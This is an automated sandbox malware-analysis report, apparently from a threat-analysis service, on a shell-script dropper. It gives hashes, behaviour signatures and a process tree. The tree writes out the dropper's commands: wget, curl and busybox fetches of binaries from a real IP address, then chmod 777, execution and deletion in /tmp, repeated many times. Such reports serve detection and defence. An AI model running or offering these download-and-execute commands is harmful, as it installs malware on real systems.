Analysis
-
max time kernel
22s -
max time network
128s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
19/10/2024, 01:51
Static task
static1
Behavioral task
behavioral1
Sample
79e44bd338732b2245e0eaaa5720123e4ed11f71a2f3747cf3f0ea58796ddcd7.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
79e44bd338732b2245e0eaaa5720123e4ed11f71a2f3747cf3f0ea58796ddcd7.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
79e44bd338732b2245e0eaaa5720123e4ed11f71a2f3747cf3f0ea58796ddcd7.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
79e44bd338732b2245e0eaaa5720123e4ed11f71a2f3747cf3f0ea58796ddcd7.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
79e44bd338732b2245e0eaaa5720123e4ed11f71a2f3747cf3f0ea58796ddcd7.sh
-
Size
10KB
-
MD5
6a9652c294e5e9472ed245126df7a12a
-
SHA1
6b6211e9cda29897067be245039e7aec7b482f0e
-
SHA256
79e44bd338732b2245e0eaaa5720123e4ed11f71a2f3747cf3f0ea58796ddcd7
-
SHA512
ebcee321431404cd9392dfec9d38e04b4cfc838bcb99512498730ea32d583d7690bcf26b0717df741102327d4f6330ca8730f3e433fd34db2250e20884c3db99
-
SSDEEP
192:2k07BhIIeyXF6IyR00QN+m0EX4q2Mk03BhISeyXF6I6i0QN+mlw:2k0BeyXoIyRlC4q2Mk0heyXoI6X
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1683 chmod 1551 chmod 1563 chmod 1569 chmod 1593 chmod 1599 chmod 1605 chmod 1629 chmod 1665 chmod 1539 chmod 1557 chmod 1617 chmod 1527 chmod 1587 chmod 1653 chmod 1689 chmod 1611 chmod 1623 chmod 1641 chmod 1647 chmod 1635 chmod 1659 chmod 1545 chmod 1677 chmod 1533 chmod 1575 chmod 1581 chmod 1671 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi 1528 SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi /tmp/8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS 1534 8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS /tmp/4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb 1540 4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb /tmp/D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz 1546 D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz /tmp/pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm 1552 pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm /tmp/JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ 1558 JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ /tmp/FhITldMHonjpiCltv4sk55YKSWt040cZ3V 1564 FhITldMHonjpiCltv4sk55YKSWt040cZ3V /tmp/yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN 1570 yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN /tmp/vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I 1576 vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I /tmp/3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK 1582 3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK /tmp/KCzhU8DZejg5hMGeh03Y535Qx5meF4eGMx 1588 KCzhU8DZejg5hMGeh03Y535Qx5meF4eGMx /tmp/4zIBEz5S5fpw2blwM9yTx4PGvYFicMymKS 1594 4zIBEz5S5fpw2blwM9yTx4PGvYFicMymKS /tmp/eRFLrhNsEEth1RdO3lfejGk7nCVWboY0kz 1600 eRFLrhNsEEth1RdO3lfejGk7nCVWboY0kz /tmp/JAZsD2co6XSFbWQzMXLdnbSIU8GMjQvkav 1606 JAZsD2co6XSFbWQzMXLdnbSIU8GMjQvkav /tmp/KCzhU8DZejg5hMGeh03Y535Qx5meF4eGMx 1612 KCzhU8DZejg5hMGeh03Y535Qx5meF4eGMx /tmp/4zIBEz5S5fpw2blwM9yTx4PGvYFicMymKS 1618 4zIBEz5S5fpw2blwM9yTx4PGvYFicMymKS /tmp/eRFLrhNsEEth1RdO3lfejGk7nCVWboY0kz 1624 eRFLrhNsEEth1RdO3lfejGk7nCVWboY0kz /tmp/JAZsD2co6XSFbWQzMXLdnbSIU8GMjQvkav 1630 JAZsD2co6XSFbWQzMXLdnbSIU8GMjQvkav /tmp/3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK 1636 3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK /tmp/SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi 1642 SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi /tmp/8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS 1648 8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS /tmp/4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb 1654 4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb /tmp/D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz 1660 D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz /tmp/pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm 1666 pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm /tmp/JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ 1672 JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ /tmp/FhITldMHonjpiCltv4sk55YKSWt040cZ3V 1678 FhITldMHonjpiCltv4sk55YKSWt040cZ3V /tmp/yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN 1684 yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN /tmp/vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I 1690 vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN curl File opened for modification /tmp/3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK curl File opened for modification /tmp/D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz curl File opened for modification /tmp/4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb curl File opened for modification /tmp/yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN curl File opened for modification /tmp/vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I curl File opened for modification /tmp/JAZsD2co6XSFbWQzMXLdnbSIU8GMjQvkav curl File opened for modification /tmp/KCzhU8DZejg5hMGeh03Y535Qx5meF4eGMx curl File opened for modification /tmp/D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz curl File opened for modification /tmp/JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ curl File opened for modification /tmp/JAZsD2co6XSFbWQzMXLdnbSIU8GMjQvkav curl File opened for modification /tmp/pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm curl File opened for modification /tmp/eRFLrhNsEEth1RdO3lfejGk7nCVWboY0kz curl File opened for modification /tmp/vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I curl File opened for modification /tmp/SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi curl File opened for modification /tmp/FhITldMHonjpiCltv4sk55YKSWt040cZ3V curl File opened for modification /tmp/eRFLrhNsEEth1RdO3lfejGk7nCVWboY0kz curl File opened for modification /tmp/4zIBEz5S5fpw2blwM9yTx4PGvYFicMymKS curl File opened for modification /tmp/pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm curl File opened for modification /tmp/JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ curl File opened for modification /tmp/FhITldMHonjpiCltv4sk55YKSWt040cZ3V curl File opened for modification /tmp/8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS curl File opened for modification /tmp/KCzhU8DZejg5hMGeh03Y535Qx5meF4eGMx curl File opened for modification /tmp/8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS curl File opened for modification /tmp/SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi curl File opened for modification /tmp/4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb curl File opened for modification /tmp/4zIBEz5S5fpw2blwM9yTx4PGvYFicMymKS curl File opened for modification /tmp/3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK curl
Processes
-
/tmp/79e44bd338732b2245e0eaaa5720123e4ed11f71a2f3747cf3f0ea58796ddcd7.sh/tmp/79e44bd338732b2245e0eaaa5720123e4ed11f71a2f3747cf3f0ea58796ddcd7.sh1⤵PID:1517
-
/bin/rm/bin/rm bins.sh2⤵PID:1518
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi2⤵PID:1519
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi2⤵
- Writes file to tmp directory
PID:1525
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi2⤵PID:1526
-
-
/bin/chmodchmod 777 SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi2⤵
- File and Directory Permissions Modification
PID:1527
-
-
/tmp/SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi./SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi2⤵
- Executes dropped EXE
PID:1528
-
-
/bin/rmrm SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi2⤵PID:1529
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS2⤵PID:1530
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS2⤵
- Writes file to tmp directory
PID:1531
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS2⤵PID:1532
-
-
/bin/chmodchmod 777 8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS2⤵
- File and Directory Permissions Modification
PID:1533
-
-
/tmp/8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS./8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS2⤵
- Executes dropped EXE
PID:1534
-
-
/bin/rmrm 8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS2⤵PID:1535
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb2⤵PID:1536
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb2⤵
- Writes file to tmp directory
PID:1537
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb2⤵PID:1538
-
-
/bin/chmodchmod 777 4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb2⤵
- File and Directory Permissions Modification
PID:1539
-
-
/tmp/4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb./4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb2⤵
- Executes dropped EXE
PID:1540
-
-
/bin/rmrm 4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb2⤵PID:1541
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz2⤵PID:1542
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz2⤵
- Writes file to tmp directory
PID:1543
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz2⤵PID:1544
-
-
/bin/chmodchmod 777 D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz2⤵
- File and Directory Permissions Modification
PID:1545
-
-
/tmp/D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz./D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz2⤵
- Executes dropped EXE
PID:1546
-
-
/bin/rmrm D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz2⤵PID:1547
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm2⤵PID:1548
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm2⤵
- Writes file to tmp directory
PID:1549
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm2⤵PID:1550
-
-
/bin/chmodchmod 777 pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm2⤵
- File and Directory Permissions Modification
PID:1551
-
-
/tmp/pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm./pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm2⤵
- Executes dropped EXE
PID:1552
-
-
/bin/rmrm pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm2⤵PID:1553
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ2⤵PID:1554
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ2⤵
- Writes file to tmp directory
PID:1555
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ2⤵PID:1556
-
-
/bin/chmodchmod 777 JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ2⤵
- File and Directory Permissions Modification
PID:1557
-
-
/tmp/JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ./JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ2⤵
- Executes dropped EXE
PID:1558
-
-
/bin/rmrm JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ2⤵PID:1559
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/FhITldMHonjpiCltv4sk55YKSWt040cZ3V2⤵PID:1560
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/FhITldMHonjpiCltv4sk55YKSWt040cZ3V2⤵
- Writes file to tmp directory
PID:1561
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/FhITldMHonjpiCltv4sk55YKSWt040cZ3V2⤵PID:1562
-
-
/bin/chmodchmod 777 FhITldMHonjpiCltv4sk55YKSWt040cZ3V2⤵
- File and Directory Permissions Modification
PID:1563
-
-
/tmp/FhITldMHonjpiCltv4sk55YKSWt040cZ3V./FhITldMHonjpiCltv4sk55YKSWt040cZ3V2⤵
- Executes dropped EXE
PID:1564
-
-
/bin/rmrm FhITldMHonjpiCltv4sk55YKSWt040cZ3V2⤵PID:1565
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN2⤵PID:1566
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN2⤵
- Writes file to tmp directory
PID:1567
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN2⤵PID:1568
-
-
/bin/chmodchmod 777 yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN2⤵
- File and Directory Permissions Modification
PID:1569
-
-
/tmp/yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN./yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN2⤵
- Executes dropped EXE
PID:1570
-
-
/bin/rmrm yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN2⤵PID:1571
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I2⤵PID:1572
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I2⤵
- Writes file to tmp directory
PID:1573
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I2⤵PID:1574
-
-
/bin/chmodchmod 777 vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I2⤵
- File and Directory Permissions Modification
PID:1575
-
-
/tmp/vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I./vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I2⤵
- Executes dropped EXE
PID:1576
-
-
/bin/rmrm vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I2⤵PID:1577
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK2⤵PID:1578
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK2⤵
- Writes file to tmp directory
PID:1579
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK2⤵PID:1580
-
-
/bin/chmodchmod 777 3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK2⤵
- File and Directory Permissions Modification
PID:1581
-
-
/tmp/3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK./3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK2⤵
- Executes dropped EXE
PID:1582
-
-
/bin/rmrm 3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK2⤵PID:1583
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/KCzhU8DZejg5hMGeh03Y535Qx5meF4eGMx2⤵PID:1584
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/KCzhU8DZejg5hMGeh03Y535Qx5meF4eGMx2⤵
- Writes file to tmp directory
PID:1585
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/KCzhU8DZejg5hMGeh03Y535Qx5meF4eGMx2⤵PID:1586
-
-
/bin/chmodchmod 777 KCzhU8DZejg5hMGeh03Y535Qx5meF4eGMx2⤵
- File and Directory Permissions Modification
PID:1587
-
-
/tmp/KCzhU8DZejg5hMGeh03Y535Qx5meF4eGMx./KCzhU8DZejg5hMGeh03Y535Qx5meF4eGMx2⤵
- Executes dropped EXE
PID:1588
-
-
/bin/rmrm KCzhU8DZejg5hMGeh03Y535Qx5meF4eGMx2⤵PID:1589
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/4zIBEz5S5fpw2blwM9yTx4PGvYFicMymKS2⤵PID:1590
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/4zIBEz5S5fpw2blwM9yTx4PGvYFicMymKS2⤵
- Writes file to tmp directory
PID:1591
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/4zIBEz5S5fpw2blwM9yTx4PGvYFicMymKS2⤵PID:1592
-
-
/bin/chmodchmod 777 4zIBEz5S5fpw2blwM9yTx4PGvYFicMymKS2⤵
- File and Directory Permissions Modification
PID:1593
-
-
/tmp/4zIBEz5S5fpw2blwM9yTx4PGvYFicMymKS./4zIBEz5S5fpw2blwM9yTx4PGvYFicMymKS2⤵
- Executes dropped EXE
PID:1594
-
-
/bin/rmrm 4zIBEz5S5fpw2blwM9yTx4PGvYFicMymKS2⤵PID:1595
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/eRFLrhNsEEth1RdO3lfejGk7nCVWboY0kz2⤵PID:1596
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/eRFLrhNsEEth1RdO3lfejGk7nCVWboY0kz2⤵
- Writes file to tmp directory
PID:1597
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/eRFLrhNsEEth1RdO3lfejGk7nCVWboY0kz2⤵PID:1598
-
-
/bin/chmodchmod 777 eRFLrhNsEEth1RdO3lfejGk7nCVWboY0kz2⤵
- File and Directory Permissions Modification
PID:1599
-
-
/tmp/eRFLrhNsEEth1RdO3lfejGk7nCVWboY0kz./eRFLrhNsEEth1RdO3lfejGk7nCVWboY0kz2⤵
- Executes dropped EXE
PID:1600
-
-
/bin/rmrm eRFLrhNsEEth1RdO3lfejGk7nCVWboY0kz2⤵PID:1601
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/JAZsD2co6XSFbWQzMXLdnbSIU8GMjQvkav2⤵PID:1602
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/JAZsD2co6XSFbWQzMXLdnbSIU8GMjQvkav2⤵
- Writes file to tmp directory
PID:1603
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/JAZsD2co6XSFbWQzMXLdnbSIU8GMjQvkav2⤵PID:1604
-
-
/bin/chmodchmod 777 JAZsD2co6XSFbWQzMXLdnbSIU8GMjQvkav2⤵
- File and Directory Permissions Modification
PID:1605
-
-
/tmp/JAZsD2co6XSFbWQzMXLdnbSIU8GMjQvkav./JAZsD2co6XSFbWQzMXLdnbSIU8GMjQvkav2⤵
- Executes dropped EXE
PID:1606
-
-
/bin/rmrm JAZsD2co6XSFbWQzMXLdnbSIU8GMjQvkav2⤵PID:1607
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/KCzhU8DZejg5hMGeh03Y535Qx5meF4eGMx2⤵PID:1608
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/KCzhU8DZejg5hMGeh03Y535Qx5meF4eGMx2⤵
- Writes file to tmp directory
PID:1609
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/KCzhU8DZejg5hMGeh03Y535Qx5meF4eGMx2⤵PID:1610
-
-
/bin/chmodchmod 777 KCzhU8DZejg5hMGeh03Y535Qx5meF4eGMx2⤵
- File and Directory Permissions Modification
PID:1611
-
-
/tmp/KCzhU8DZejg5hMGeh03Y535Qx5meF4eGMx./KCzhU8DZejg5hMGeh03Y535Qx5meF4eGMx2⤵
- Executes dropped EXE
PID:1612
-
-
/bin/rmrm KCzhU8DZejg5hMGeh03Y535Qx5meF4eGMx2⤵PID:1613
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/4zIBEz5S5fpw2blwM9yTx4PGvYFicMymKS2⤵PID:1614
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/4zIBEz5S5fpw2blwM9yTx4PGvYFicMymKS2⤵
- Writes file to tmp directory
PID:1615
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/4zIBEz5S5fpw2blwM9yTx4PGvYFicMymKS2⤵PID:1616
-
-
/bin/chmodchmod 777 4zIBEz5S5fpw2blwM9yTx4PGvYFicMymKS2⤵
- File and Directory Permissions Modification
PID:1617
-
-
/tmp/4zIBEz5S5fpw2blwM9yTx4PGvYFicMymKS./4zIBEz5S5fpw2blwM9yTx4PGvYFicMymKS2⤵
- Executes dropped EXE
PID:1618
-
-
/bin/rmrm 4zIBEz5S5fpw2blwM9yTx4PGvYFicMymKS2⤵PID:1619
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/eRFLrhNsEEth1RdO3lfejGk7nCVWboY0kz2⤵PID:1620
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/eRFLrhNsEEth1RdO3lfejGk7nCVWboY0kz2⤵
- Writes file to tmp directory
PID:1621
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/eRFLrhNsEEth1RdO3lfejGk7nCVWboY0kz2⤵PID:1622
-
-
/bin/chmodchmod 777 eRFLrhNsEEth1RdO3lfejGk7nCVWboY0kz2⤵
- File and Directory Permissions Modification
PID:1623
-
-
/tmp/eRFLrhNsEEth1RdO3lfejGk7nCVWboY0kz./eRFLrhNsEEth1RdO3lfejGk7nCVWboY0kz2⤵
- Executes dropped EXE
PID:1624
-
-
/bin/rmrm eRFLrhNsEEth1RdO3lfejGk7nCVWboY0kz2⤵PID:1625
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/JAZsD2co6XSFbWQzMXLdnbSIU8GMjQvkav2⤵PID:1626
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/JAZsD2co6XSFbWQzMXLdnbSIU8GMjQvkav2⤵
- Writes file to tmp directory
PID:1627
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/JAZsD2co6XSFbWQzMXLdnbSIU8GMjQvkav2⤵PID:1628
-
-
/bin/chmodchmod 777 JAZsD2co6XSFbWQzMXLdnbSIU8GMjQvkav2⤵
- File and Directory Permissions Modification
PID:1629
-
-
/tmp/JAZsD2co6XSFbWQzMXLdnbSIU8GMjQvkav./JAZsD2co6XSFbWQzMXLdnbSIU8GMjQvkav2⤵
- Executes dropped EXE
PID:1630
-
-
/bin/rmrm JAZsD2co6XSFbWQzMXLdnbSIU8GMjQvkav2⤵PID:1631
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK2⤵PID:1632
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK2⤵
- Writes file to tmp directory
PID:1633
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK2⤵PID:1634
-
-
/bin/chmodchmod 777 3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK2⤵
- File and Directory Permissions Modification
PID:1635
-
-
/tmp/3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK./3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK2⤵
- Executes dropped EXE
PID:1636
-
-
/bin/rmrm 3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK2⤵PID:1637
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi2⤵PID:1638
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi2⤵
- Writes file to tmp directory
PID:1639
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi2⤵PID:1640
-
-
/bin/chmodchmod 777 SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi2⤵
- File and Directory Permissions Modification
PID:1641
-
-
/tmp/SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi./SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi2⤵
- Executes dropped EXE
PID:1642
-
-
/bin/rmrm SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi2⤵PID:1643
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS2⤵PID:1644
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS2⤵
- Writes file to tmp directory
PID:1645
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS2⤵PID:1646
-
-
/bin/chmodchmod 777 8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS2⤵
- File and Directory Permissions Modification
PID:1647
-
-
/tmp/8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS./8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS2⤵
- Executes dropped EXE
PID:1648
-
-
/bin/rmrm 8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS2⤵PID:1649
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb2⤵PID:1650
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb2⤵
- Writes file to tmp directory
PID:1651
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb2⤵PID:1652
-
-
/bin/chmodchmod 777 4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb2⤵
- File and Directory Permissions Modification
PID:1653
-
-
/tmp/4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb./4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb2⤵
- Executes dropped EXE
PID:1654
-
-
/bin/rmrm 4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb2⤵PID:1655
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz2⤵PID:1656
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz2⤵
- Writes file to tmp directory
PID:1657
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz2⤵PID:1658
-
-
/bin/chmodchmod 777 D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz2⤵
- File and Directory Permissions Modification
PID:1659
-
-
